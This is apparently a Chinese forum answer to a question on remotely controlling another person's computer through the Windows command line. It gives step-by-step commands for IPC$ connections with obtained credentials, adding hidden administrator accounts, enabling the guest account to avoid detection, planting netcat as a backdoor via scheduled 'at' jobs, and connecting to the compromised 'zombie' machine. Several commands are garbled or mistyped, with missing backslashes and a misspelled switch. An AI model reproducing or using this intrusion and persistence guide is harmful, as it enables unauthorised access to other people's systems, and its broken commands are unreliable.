n0905:怎样远程别机，最好有详细点用WINDOWS的CMD功能

只要你拥有某ip的用户名和密码，就可以进行ipc$空连接！
这里我们假如你得到的用户是fish，密码是123456。假设对方ip为127.0.0.1
net use 127.0.0.1ipc$ "123456" /user:"fish"
切断空连接的命令是
net use 127.0.0.1ipc$ /delte
这样你便等于登录上了此ip的电脑,但至此你还没有获得任何权限
下面讲述如何创建一个自己的帐户
net user honkstudent 123 /add
如果命令显示成功,则说明添加用户成功,下一步要做的便是将此用户提升为管理员
net localgroup administrator honkstudent /add
如果命令显示成功,说明己经升级此用户的权限为管理员.
如果怕让管理员发现而不想自己创建帐户,便可以将默认的guest帐户提升为管理员
net user guest /active:yes
如果命令成功,则激活windows下guest帐户成功,
下一步便为guest帐户添加密码
net user guest 123
命令成功后你便拥有了系统游客的权限,但这些远远不够,猜到后面该怎么做了吧?^_^
net localgroup administrator guest /add
命令成功后你这个游客便拥有了和管理员一样的操作等级了

2:远程运行命令:at

如果您己经进入某台主机后,想为将来"名正言顺"的再次进入该主机作打算,该怎么办呢?不用说,当然得做个后门,这就少不了远程运行命令:at
首先你要将你最得意的木马植入那台服务器,
copy c:nc.exe 127.0.0.1admin$
(介绍一下nc.nc为netcat简称,是网上最有名的木马程序之一,运行后打开系统telnet服务,默认端口为99)
然后所要做的事便是要让这个后门在服务器上运行:
首先获得服务器上时间:net time 127.0.0.1
假设返回的对方系统时间为11:58
获得时间后你便可以对系统加入一个作业id,id=1(必须要系统启动了schedule服务)
at 127.0.0.1 12:00 nc.exe
如果命令成功便会返回一个id号,你便可以在12:00以后远程登录上这台服务器了

3:远程登录:telnet

这个命令非常实用,它可以与远方做连接，不过正常下需要密码、用户,不过你给对方种
了木马,直接连到这个木马打开的端口.
telnet 127.0.0.1 99
这样就可以连到对方的99端口.那你就可以在对方运行命令了,这个也就是肉鸡.
辟如：
cmd>ping -t ping对方机器 (前提:对方没有进行tcp/ip数据包限制)
cmd>netstat -a ipaddress (获取对方机器当前活动的相关进程)
cmd>net view ip-address ( 通上,适用于win98)
cmd>net use x:ipipc$ /user:username password (用相关账号和密码登陆对方机器)
cmd>net send ip message 向指定ip发送message (前提是对方机器没有关message se
nd 服务)
cmd>net time ( 是对方机器时间于本机同步)
cmd>at ipaddress time c:winntsystem32net.exe user account password /add (在对方机器中增添账号和密码)
cmd>copy con *.bat @echo tsenable=on>>
cmd>copy *.bat x: ( 复制文件到对方机器)
ftp
telnet
………………
还有很多，建议看看操作系统的帮助，查询commamd就有了。